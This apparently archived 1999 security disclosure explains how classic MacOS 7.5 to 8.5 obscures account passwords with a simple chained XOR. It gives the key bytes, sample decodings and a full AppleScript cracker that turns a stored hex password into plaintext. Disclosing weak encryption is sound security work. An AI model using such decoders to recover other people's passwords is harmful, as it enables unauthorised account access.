MacOS_encryption.txt

`Subject: MacOS system encryption algorithm  
To: [email protected]   
  
  
The encryption algorithm in MacOS system is simple and the password can be  
easily decoded.  
  
  
Password is stored in Users & Groups Data File in Preferences folder. Offset  
is different on each system and depends on Users & Groups configuration, but  
it always lie after owner's username. It's not so difficult to find it using  
hex editor, even if we don't know owner's username.  
  
  
Here are some examples of encrypted passwords:  
00 04 06 18 0D 0A 19 0B = stayaway  
0A 1F 10 1B 00 07 75 1E = yellow  
1C 1B 16 14 12 62 10 7B = owner  
07 02 13 1A 1E 0F 1A 14 = turnpage  
27 25 33 27 27 39 24 7E = Trustno1  
  
  
AA BB CC DD EE FF GG HH = aa bb cc dd ee ff gg hh  
  
  
where:  
AA BB CC DD EE FF GG HH - encrypted password (hex)  
aa bb cc dd ee ff gg hh - decrypted password in ASCII codes (hex)  
  
  
aa=AA XOR 73H  
bb=BB XOR AA XOR 70H  
cc=CC XOR BB XOR 63H  
dd=DD XOR CC XOR 67H  
ee=EE XOR DD XOR 74H  
ff=FF XOR EE XOR 70H  
gg=GG XOR FF XOR 72H  
hh=HH XOR GG XOR 6BH  
  
  
An example:  
Let's take OO 04 06 18 0D 0A 19 0B  
  
  
00H XOR 73H = 73H = s  
04H XOR 00H = 04H; 04H XOR 70H = 74H = t  
06H XOR 04H = 02H; O2H XOR 63H = 61H = a  
18H XOR 06H = 1EH; 1EH XOR 67H = 79H = y  
0DH XOR 18H = 15H; 15H XOR 74H = 61H = a  
0AH XOR 0DH = 07H; 07H XOR 70H = 77H = w  
19H XOR 0AH = 13H; 13H XOR 72H = 61H = a  
0BH XOR 19H = 12H; 12H XOR 6BH = 79H = y  
  
  
tested on:  
MacOS 7.5.3, 7.5.5, 8.1, 8.5  
  
  
I wrote an apple script to break passwords  
  
  
--------CUT HERE--------  
(* MacOS Pass 2.1 by adix 15.06.99; Apple Script English *)  
global lbin, bit1, bit2, bitk  
set hex1 to text returned of (display dialog "Enter encrypted password  
(hex): " default answer "" buttons {" Ok "} default button " Ok " with icon  
stop)  
set Alicia to  
"0111001101110000011000110110011101110100011100000111001001101011"  
set pass to ""  
set lbin to ""  
set razem to ""  
set i to 1  
set skok to 0  
set ile to count items in hex1  
if ile = 0 or ile = 1 then  
set pass to ""  
else  
repeat until (i > (ile - 1))  
set kodascii to 0  
set razem to ""  
set zn to items (i) thru (i + 1) in hex1  
set lbin to hex2bin(zn)  
repeat with a from 1 to 8  
set bit1 to item (a + skok) of Alicia  
xor(a)  
set razem to {razem & bitk} as string  
if i < 2 then  
set kodascii to {kodascii + bitk * (2 ^ (8 - a))}  
end if  
end repeat  
if i < 2 then  
set pass to {pass & (ASCII character kodascii)}  
else  
set zn to items (i - 2) thru (i - 1) in hex1  
set lbin to hex2bin(zn)  
repeat with a from 1 to 8  
set bit1 to item a of razem  
xor(a)  
set kodascii to {kodascii + bitk * (2 ^ (8 - a))}  
end repeat  
set pass to {pass & (ASCII character kodascii)}  
end if  
set skok to skok + 8  
set i to i + 2  
end repeat  
end if  
display dialog "Password: " & pass & return & return & "by adix" buttons  
{" Ok "} default button " Ok " with icon note  
on hex2bin(zn)  
set temphex to {"0000", "0001", "0010", "0011", "0100", "0101", "0110",  
"0111", "1000", "1001", "1010", "1011", "1100", -  
"1101", "1110", "1111"}  
set t2hex to "0123456789ABCDEF"  
set bin to ""  
repeat with j in zn  
set t1 to j as string  
repeat with i from 1 to (count items in t2hex)  
if ((item i in t2hex) = t1) then  
set temp to (item i in temphex)  
exit repeat  
end if  
end repeat  
set bin to {bin & temp} as string  
end repeat  
return (bin)  
end hex2bin  
on xor(a)  
set bit2 to item a in lbin  
if bit1 = bit2 then  
set bitk to "0"  
else  
set bitk to "1"  
end if  
end xor  
--------CUT HERE--------  
  
  
Dawid adix Adamski  
[email protected]  
`